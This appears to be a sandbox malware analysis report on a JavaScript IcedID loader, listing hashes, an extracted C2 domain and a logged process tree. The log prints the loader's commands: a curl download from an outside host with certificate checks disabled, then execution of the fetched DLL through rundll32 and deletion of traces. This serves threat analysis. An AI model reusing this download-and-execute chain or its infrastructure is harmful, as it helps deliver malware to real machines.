Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
141s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230831-en -
resource tags
arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system -
submitted
01/09/2023, 16:49
Static task
static1
Behavioral task
behavioral1
Sample
fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
Resource
win10v2004-20230831-en
General
-
Target
fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
-
Size
34KB
-
MD5
d38a35de750d0d8628cb073a9a0ad8b2
-
SHA1
b98af1c8fe2a75060fa25a7eee20c32518271822
-
SHA256
fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947
-
SHA512
b7348f060b646efd8e7501ce7a411346b7de95a715b7a1d2294df32c2b4ed425262ef0102af2d72c5f3d0f5f8db2f0feede4f5885a2fa6d48f9c2c9b40cde247
-
SSDEEP
768:RwRahuDvIhINs1sCT7A797k7a7a7Q7u7F7r7e7I7B7C7D7N7y7o727B7of7y7M76:RwRahBhIN3CTMJ4W+cC5fS0VWnJWk6l5
Malware Config
Extracted
icedid
4240553492
oopscokir.com
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 1 IoCs
pid Process 4856 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4856 rundll32.exe 4856 rundll32.exe 4856 rundll32.exe 4856 rundll32.exe 4856 rundll32.exe 4856 rundll32.exe 4856 rundll32.exe 4856 rundll32.exe 3340 Process not Found 3340 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4856 rundll32.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4248 wrote to memory of 4976 4248 wscript.exe 83 PID 4248 wrote to memory of 4976 4248 wscript.exe 83 PID 4248 wrote to memory of 2592 4248 wscript.exe 85 PID 4248 wrote to memory of 2592 4248 wscript.exe 85 PID 4248 wrote to memory of 4524 4248 wscript.exe 87 PID 4248 wrote to memory of 4524 4248 wscript.exe 87 PID 4524 wrote to memory of 3696 4524 cmd.exe 89 PID 4524 wrote to memory of 3696 4524 cmd.exe 89 PID 4248 wrote to memory of 2404 4248 wscript.exe 94 PID 4248 wrote to memory of 2404 4248 wscript.exe 94 PID 4248 wrote to memory of 4856 4248 wscript.exe 96 PID 4248 wrote to memory of 4856 4248 wscript.exe 96 PID 4248 wrote to memory of 888 4248 wscript.exe 97 PID 4248 wrote to memory of 888 4248 wscript.exe 97
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js"2⤵PID:4976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\Admin\AppData\Local\Temp\dignissimos.neaque.x" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\dignissimos.n.bat"2⤵PID:2592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\dignissimos.n.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Windows\system32\curl.execurl https://avestainfratech.com/out/t.php --output "C:\Users\Admin\AppData\Local\Temp\dignissimos.neaque.x" --ssl-no-revoke --insecure --location3⤵PID:3696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\dignissimos.neaque.x" "dignissimos.n"2⤵PID:2404
-
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\dignissimos.n", scab /k arabika7522⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4856
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\dignissimos.n.bat"2⤵PID:888
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
638KB
MD53601ef1cf714bb9fd40ce1652e6bffeb
SHA1d652aada52ae0e93692e2065d9c93cf133537eab
SHA2563f37e609296627b612ba88cecf1fb90985ff5b9760510f8a6127de0d7a9cf1e2
SHA5120a4e4ed9d24784ff1cee5183adbd3bece731b087217368a683c697d85db42f79682007dfae9c3aa72ec4cef5dd3942404da4cd6acefcb4bf037e00369a16ec08
-
Filesize
149B
MD5c35fe7fbb1aec6c72da5d0fdeb26c222
SHA1f0ef85f0d7fed0b54dc9f7fadf777089b1f404f8
SHA256737835adf64ffb2bfd6dc3d7ab2d23d2c82f292ec736997f5fa5f89eb8c13983
SHA512727213eeebfeb2222113a683e681642bbb7d3df42e32ae0e4457689b7bb8c6630122b1b6c1d220073b1ac44c749cf03d3074ec034237cec2f0680126eef875ff
-
Filesize
638KB
MD53601ef1cf714bb9fd40ce1652e6bffeb
SHA1d652aada52ae0e93692e2065d9c93cf133537eab
SHA2563f37e609296627b612ba88cecf1fb90985ff5b9760510f8a6127de0d7a9cf1e2
SHA5120a4e4ed9d24784ff1cee5183adbd3bece731b087217368a683c697d85db42f79682007dfae9c3aa72ec4cef5dd3942404da4cd6acefcb4bf037e00369a16ec08